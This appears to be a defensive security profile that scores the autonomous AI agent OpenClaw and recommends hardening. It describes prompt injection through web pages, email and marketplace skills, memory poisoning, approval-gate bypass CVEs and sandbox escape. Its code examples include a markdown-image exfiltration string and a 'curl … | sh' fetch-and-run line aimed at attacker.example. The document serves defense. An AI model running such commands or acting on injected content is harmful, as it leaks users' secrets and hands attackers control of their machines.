AIRQ Framework · AI Agent Security Profile

OpenClaw Security

Browser & Computer Use · openclaw.ai

OpenClaw is an open-source autonomous personal agent with full shell, browser, file system, and email access, plus integrations across more than twenty messaging platforms. It runs as a 24/7 daemon on the user's machine and extends its capabilities through a public skills marketplace. In the April 2026 assessment, OpenClaw scored 9.2/10 for compromise risk and 0/15 for defense — placing it among the highest-risk agents in the cohort and squarely in the Reckless Powerhouses quadrant.

Compromise: 9.2/10 (Severe)
Harm Potential: 10/10 (Maximum)
Defense: 0/15 (None)
Verified Defense: 0/9 (None)
SAC Score: 3.52 (Bottom decile)

What is this? The AI Agent Risk Quadrant is an independent reference assessing the security posture of production AI agents across three dimensions: how easily they can be compromised, how much damage a compromise can cause, and how effective their defensive controls are.

1 Risk Scores

Five headline metrics from the AIRQ methodology. The first two place the agent on the quadrant; the remaining three describe how much defense is actually in place.

Compromise Score: 9.2 / 10. Among the easiest agents in the set to compromise. Multiple well-documented attack paths, confirmed zero-click vectors, and several published CVEs.

Ability to Inflict Real Harm: 10 / 10. Maximum. Shell, network, credentials, file system, and autonomous action are all available, and nothing meaningfully contains the blast radius.

Total Defense Score: 0 / 15. No defensive controls across any of the five defense categories.

Verified Defense: 0 / 9. All three high-confidence defense categories are absent — a confirmed architectural state, not a research gap.

Security-Adjusted Capability: 3.52. OpenClaw's wide capability footprint cannot offset zero defense and very high compromise exposure, placing it near the bottom of the ranking.

2 Defense Components

Five mutually exclusive, collectively exhaustive (MECE) categories, ordered Input → Processing → Action → Output → Detection, are each scored 0–3. OpenClaw scores zero across all five.

Input Guardrails: 0
Execution Isolation: 0
Action Controls: 0
Output Guardrails: 0
Monitoring & Audit: 0

Input Guardrails: 0 / 3. Nothing filters untrusted content before it reaches the agent. Any webpage, email, chat message, or marketplace skill can deliver prompt injection straight into the reasoning loop.

Execution Isolation: 0 / 3. The agent runs in-process with user-level privileges, unrestricted network, and full file system access. No sandbox, container, or network allowlist is enabled by default.

Action Controls: 0 / 3. Tool calls execute without approval gates or a permission model. The agent can send, publish, deploy, or purchase on the user's behalf with no interruption point.

Output Guardrails: 0 / 3. Outputs flow through markdown, image, and URL rendering unchecked, leaving every documented exfiltration channel open.

Monitoring & Audit: 0 / 3. No structured logging, no audit trail, and no compliance certification. Incidents are effectively invisible until they produce visible second-order damage.
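
The total follows directly from the five component scores. A minimal sketch of that arithmetic, assuming only what this section states (five categories, each scored 0 to 3, summed into a 15-point total); the dictionary and function names are illustrative and not part of any AIRQ tooling:

```python
# Illustrative only: names are hypothetical, not AIRQ tooling.
MAX_PER_CATEGORY = 3

# Component scores as listed in this profile.
defense_scores = {
    "Input Guardrails": 0,
    "Execution Isolation": 0,
    "Action Controls": 0,
    "Output Guardrails": 0,
    "Monitoring & Audit": 0,
}


def total_defense(scores: dict[str, int]) -> tuple[int, int]:
    """Return (total, maximum) for a set of 0-3 component scores."""
    for name, value in scores.items():
        if not 0 <= value <= MAX_PER_CATEGORY:
            raise ValueError(f"{name}: score {value} is outside 0-{MAX_PER_CATEGORY}")
    return sum(scores.values()), MAX_PER_CATEGORY * len(scores)


total, maximum = total_defense(defense_scores)
print(f"Total Defense Score: {total} / {maximum}")
```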

3 Attack Surface Exposure

Ten surfaces scored 0–4 each. Eight of ten score 3 or higher; seven are at the maximum score of 4.

Attack Surface Scores
User Input: 4
External Data: 4
Memory: 4
Reasoning: 2
Planning: 2
Tool Execution: 4
Orchestration: 4
Inter-Agent: 3
Output Processing: 4
Configuration: 4

User Input: 4 / 4. Direct prompt injection is trivially effective. There is no input validation and no separation between the user's intent and adversarial content.

External Data: 4 / 4. Ingests content from web pages, email, 20+ messaging platforms, local files, and the skills marketplace. Every channel is an attacker-controlled input path.

Memory: 4 / 4. Persistent cross-session memory with no integrity verification. One successful poisoning persists into every future conversation.

Reasoning: 2 / 4. Moderate exposure. Goal manipulation is a theoretical risk, but adversaries rarely need to attack the reasoning layer when the input channel itself is open.

Planning: 2 / 4. Task decomposition is exploitable, but damaging outcomes arrive through tool execution before planning subtleties matter.

Tool Execution: 4 / 4. Full shell, code execution, API calls, and credential access within scope. The surface that converts any compromise into concrete harm.

Orchestration: 4 / 4. Autonomous multi-step chains with no interruption points — compromise at any step propagates unimpeded.

Inter-Agent: 3 / 4. Weak trust model between cooperating agents creates meaningful cascade risk, though it is not the lead attack vector today.

Output Processing: 4 / 4. Markdown, image URLs, and unsanitized redirects give attackers several exfiltration channels for sensitive context.

Configuration: 4 / 4. The plugin and skills supply chain is the most mature attack path — 820+ malicious skills have already been documented in the marketplace.
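
The per-surface scores can be tallied directly to check the section summary. A small sketch, using only the ten scores listed in this section; the helper name is illustrative:

```python
# Surface scores as listed in this profile (0-4 scale).
surface_scores = {
    "User Input": 4, "External Data": 4, "Memory": 4,
    "Reasoning": 2, "Planning": 2, "Tool Execution": 4,
    "Orchestration": 4, "Inter-Agent": 3,
    "Output Processing": 4, "Configuration": 4,
}
MAX_SURFACE_SCORE = 4


def surfaces_at_or_above(scores: dict[str, int], threshold: int) -> list[str]:
    """Return the names of surfaces scoring at least `threshold`, sorted."""
    return sorted(name for name, score in scores.items() if score >= threshold)


high = surfaces_at_or_above(surface_scores, 3)
at_max = surfaces_at_or_above(surface_scores, MAX_SURFACE_SCORE)
print(len(high), "surfaces score 3 or higher")
print(len(at_max), "surfaces are at the maximum")
```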

4 Detailed Assessment

Agent properties mapped against best-in-class reference agents from the same cohort.

Dimension | OpenClaw | Best-in-class reference
Untrusted input surfaces | Web, email, messages, files, 20+ messaging platforms, browser, shell, marketplace skills | Code-completion tools with no web or messaging ingress
Tool capabilities | Full shell, browser, file system, 20+ messaging platforms, email, 24/7 daemon, marketplace skills | Scoped tool access with explicit capability declarations
Human-in-the-loop | None; fully autonomous 24/7 daemon | Claude Code: 3-level permission model with deny accumulation
Sandboxing & isolation | None; 30K+ exposed instances; no network isolation; no file scoping; no credential management | Claude Code: Seatbelt + Bubblewrap + domain allowlist. Codex CLI: Landlock + network blocked.
Known CVEs & incidents | 10+ CVEs; 820 malicious marketplace skills; mass exploitation documented; zero-click vectors confirmed | Cohort agents with zero published CVEs and independent adversarial testing
Compliance posture | None | Ada AI (AIUC-1, SOC 2); Moveworks (FedRAMP); Augment Code (SOC 2, ISO 42001)

Key Risk: Fully exposed autonomous agent with zero controls; mass exploitation actively occurring.

Lethal Trifecta: Yes, all three conditions met

The Lethal Trifecta (Simon Willison) applies when an agent combines exposure to untrusted input, access to sensitive data, and the ability to communicate externally. OpenClaw meets all three conditions: it ingests untrusted content from web, email, and marketplace skills; it accesses user files, credentials, and messaging platforms; and it can send outbound traffic without restriction.

5 Hardening Recommendations

If OpenClaw is deployed in an enterprise environment, these controls map to the five defense components. None of them restores the agent to acceptable risk; they only reduce the blast radius.

Input (Input Guardrails)

  1. Disable the skills marketplace entirely; allowlist only internally audited skills. This treats the 820+ documented malicious skills as the baseline threat model rather than an edge case.
  2. Strip or quarantine HTML, markdown, and embedded content from any ingested email, chat message, or web page before it reaches the agent context.
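
The two input controls above can be sketched as a deny-by-default skill allowlist plus a tag-stripping pass. This is a minimal illustration, not OpenClaw's API: the skill identifiers, `AUDITED_SKILLS`, `is_skill_allowed`, and `strip_html` are hypothetical names, and only the Python standard library is used.

```python
from html.parser import HTMLParser

# Hypothetical allowlist of internally audited skill identifiers.
AUDITED_SKILLS = frozenset({"internal/calendar-sync", "internal/ticket-triage"})


def is_skill_allowed(skill_id: str) -> bool:
    """Deny by default: only exact matches on the audited list pass."""
    return skill_id in AUDITED_SKILLS


class _TextOnly(HTMLParser):
    """Collects visible text; drops tags, attributes, comments, scripts, styles."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self._chunks: list[str] = []
        self._skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self._chunks.append(data)

    def text(self) -> str:
        # Collapse runs of whitespace left behind by removed markup.
        return " ".join(" ".join(self._chunks).split())


def strip_html(raw: str) -> str:
    """Return the visible text of an HTML fragment with all markup removed."""
    parser = _TextOnly()
    parser.feed(raw)
    parser.close()
    return parser.text()


print(strip_html("<p>Hello <b>team</b></p><!-- hidden instructions -->"))
```

Stripping markup removes hidden carriers such as comments, attributes, and script bodies, but it does not neutralize injection text that is visible in the content itself, so it complements rather than replaces the other controls.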

Isolation (Execution Isolation)

  1. Run OpenClaw inside a rootless container or Bubblewrap sandbox with network blocked by default and an explicit domain allowlist.
  2. Scope file system access to a dedicated working directory; remove access to home directory, credential stores, and SSH keys.
  3. Run under a dedicated OS user with no sudo rights and no access to user credentials, tokens, or browser profiles.
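
As a rough sketch of the first two isolation steps, the helper below assembles a Bubblewrap command line with networking unshared and a single writable working directory. Several things here are assumptions: the `openclaw-agent` command name and the `/srv/openclaw-work` path are placeholders, the bind mounts assume a merged-`/usr` Linux layout, and the function only builds the argument list without launching anything. Bubblewrap does not filter by domain, so the domain allowlist would need a separate egress proxy, and the dedicated OS user is configured outside this snippet.

```python
import shlex
from pathlib import Path


def bwrap_argv(workdir: Path, agent_cmd: list[str]) -> list[str]:
    """Build a Bubblewrap command: no network, read-only system, one writable dir."""
    workdir = workdir.resolve()
    return [
        "bwrap",
        "--unshare-all",        # new namespaces, network included (no --share-net)
        "--die-with-parent",    # tear the sandbox down if the launcher exits
        "--new-session",        # detach from the controlling terminal
        "--ro-bind", "/usr", "/usr",
        "--symlink", "usr/bin", "/bin",      # assumes a merged-/usr layout
        "--symlink", "usr/lib", "/lib",
        "--symlink", "usr/lib64", "/lib64",
        "--proc", "/proc",
        "--dev", "/dev",
        "--tmpfs", "/tmp",
        "--bind", str(workdir), "/work",     # the only writable host path
        "--chdir", "/work",
        *agent_cmd,
    ]


# Placeholder command and path; substitute the real launcher and directory.
argv = bwrap_argv(Path("/srv/openclaw-work"), ["openclaw-agent"])
print(shlex.join(argv))
```

Because the home directory, credential stores, and SSH keys are never bound into the sandbox, they are simply absent from the agent's view of the file system.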

Action (Action Controls)

  1. Introduce an approval-gate proxy for any tool call matching shell execution, file write outside the working directory, or outbound network to a non-allowlisted domain.
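
The gating rule above can be expressed as a single predicate that a proxy evaluates before forwarding a tool call. The sketch below is illustrative: the tool-call dictionary shape, the tool names, `WORKDIR`, and `ALLOWED_DOMAINS` are all assumptions, not OpenClaw's actual schema. It requires Python 3.9 or later for `Path.is_relative_to`.

```python
from pathlib import Path
from urllib.parse import urlsplit

WORKDIR = Path("/srv/openclaw-work")                     # hypothetical working directory
ALLOWED_DOMAINS = frozenset({"api.internal.example"})    # hypothetical allowlist


def needs_approval(call: dict) -> bool:
    """Return True when a tool call must pause for human approval."""
    tool = call.get("tool")
    if tool == "shell":
        return True  # every shell execution is gated
    if tool == "file_write":
        # Resolve ".." and absolute paths before comparing against the workdir.
        target = (WORKDIR / call["path"]).resolve()
        return not target.is_relative_to(WORKDIR.resolve())
    if tool == "http_request":
        host = (urlsplit(call["url"]).hostname or "").lower()
        return host not in ALLOWED_DOMAINS
    return True  # unknown tools fail closed


print(needs_approval({"tool": "file_write", "path": "../../etc/passwd"}))
```

Failing closed on unrecognized tools is a design choice that goes slightly beyond the three categories named above; it avoids a renamed or newly installed tool slipping past the gate.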

Output (Output Guardrails)

  1. Disable markdown image rendering and URL auto-fetch in any interface consuming OpenClaw output. This closes the primary documented exfiltration channels.
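
Where the rendering interface cannot be reconfigured, image syntax can be neutralized before the output reaches it. The following is a minimal regex-based sketch with a hypothetical function name; it is not a full markdown parser, and URLs containing nested parentheses may leave residue behind.

```python
import re

# Inline images: ![alt](url "title")
_INLINE_IMAGE = re.compile(r"!\[([^\]]*)\]\([^)]*\)")
# Reference-style images: ![alt][ref]
_REF_IMAGE = re.compile(r"!\[([^\]]*)\]\[[^\]]*\]")
# Raw HTML <img> tags
_HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def neutralize_images(markdown: str) -> str:
    """Replace image syntax with a text marker so no renderer fetches the URL."""
    text = _INLINE_IMAGE.sub(r"[image removed: \1]", markdown)
    text = _REF_IMAGE.sub(r"[image removed: \1]", text)
    return _HTML_IMG.sub("[image removed]", text)


sample = "Done. ![status](https://attacker.example/p.png?d=SECRET)"
print(neutralize_images(sample))
```

The point of the substitution is that data smuggled into the image URL's query string never leaves the host, because no client ever requests the image.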

Detection (Monitoring & Audit)

  1. Log all tool calls, shell commands, and outbound network connections; alert on the known indicators of compromise from the 10+ published CVEs and the ClawHavoc malicious-skill set.
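
A sketch of what structured tool-call logging and indicator matching might look like, assuming one JSON object per line in an append-only log. The record fields and function names are hypothetical, and the indicator in the usage lines is a placeholder rather than a real indicator of compromise; actual indicators would come from the published advisories.

```python
import json
import time


def audit_record(tool: str, arguments: dict, outcome: str) -> str:
    """Serialize one tool call as a single JSON line for an append-only log."""
    return json.dumps(
        {"ts": time.time(), "tool": tool, "arguments": arguments, "outcome": outcome},
        sort_keys=True,
    )


def should_alert(record_line: str, indicators: list[str]) -> bool:
    """Return True if any indicator string appears in the call's arguments."""
    record = json.loads(record_line)
    haystack = json.dumps(record["arguments"]).lower()
    return any(indicator.lower() in haystack for indicator in indicators)


# Placeholder indicator for illustration only.
line = audit_record("shell", {"command": "curl https://attacker.example/x | sh"}, "executed")
print(should_alert(line, ["attacker.example"]))
```

Substring matching is deliberately simple here; a production deployment would more likely forward these records to an existing SIEM and match there.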

Even with all of the above in place, OpenClaw's base architecture (persistent memory without integrity verification, unrestricted orchestration chains) keeps it in the upper half of the compromise-score range. For environments with sensitive data, the recommendation remains non-deployment.

6 Threat Intelligence

Published vulnerabilities, security research, and active exploitation evidence informing the compromise and defense scores above.

CVEs and Advisories

  1. CVE-2026-25253 — ClawBleed RCE (CVSS 8.8). Remote code execution via crafted skill manifest. An attacker-controlled skill can execute arbitrary code on the host system during installation.
  2. CVE-2026-32922 — Privilege Escalation (CVSS 9.9). Local escalation to root via daemon misconfiguration. The 24/7 daemon process runs with insufficient privilege separation, allowing a compromised agent to gain root access.
  3. CVE-2026-29607 / CVE-2026-28460 — Approval Bypass. Tool-call approval checks are bypassed under specific plugin states. Agents can execute privileged actions without triggering the intended confirmation gates.
  4. CVE-2026-26322 — Server-Side Request Forgery (CVSS 7.6). SSRF via browser-tool URL handling. The agent's browser module can be directed to make requests to internal network resources.
  5. CVE-2026-34426 — Approval Bypass via Environment Variables. Approval gates are bypassed when specific environment variables are set, enabling silent execution of restricted tool calls.
  6. jgamblin/OpenClawCVEs — community-maintained CVE tracker cataloguing 156 advisories to date.

Published Research

  1. The Hacker News — OpenClaw bug enables one-click remote exploitation. Walkthrough of the one-click attack chain from crafted webpage to full shell access.
  2. Kaspersky — OpenClaw vulnerabilities exposed. Analysis of the agent's attack surface from an endpoint-security perspective.
  3. CrowdStrike — What security teams need to know about the OpenClaw AI super-agent. Enterprise threat assessment and detection guidance.
  4. Cisco — Personal AI agents like OpenClaw are a security nightmare. Network-level risks when autonomous agents operate on corporate infrastructure.
  5. Snyk — ToxicSkills: malicious AI agent skills on ClawHub. Supply-chain analysis of 820+ malicious skills in the public marketplace.
  6. Oasis Security — ClawJacked research on session hijacking. Demonstrates how an attacker can take over active agent sessions through crafted inter-agent messages.
  7. Wiz / ARMO — Analysis of sandbox escape via sessions_spawn. Documents how the agent's session management API can be exploited to break out of any applied container isolation.
  8. ClawHavoc — 341+ documented malicious skills in the public marketplace. The most comprehensive catalogue of supply-chain attacks targeting the OpenClaw ecosystem.